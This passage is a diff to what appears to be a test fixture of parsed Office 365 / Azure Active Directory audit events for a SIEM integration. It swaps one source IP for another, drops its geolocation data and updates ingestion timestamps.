principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5260,25 +4792,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5292,7 +4806,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5428,7 +4942,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5440,12 +4954,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036230900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124987500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -5471,25 +4985,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -5503,7 +4999,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -5639,7 +5135,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -5651,12 +5147,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036237100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124994100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"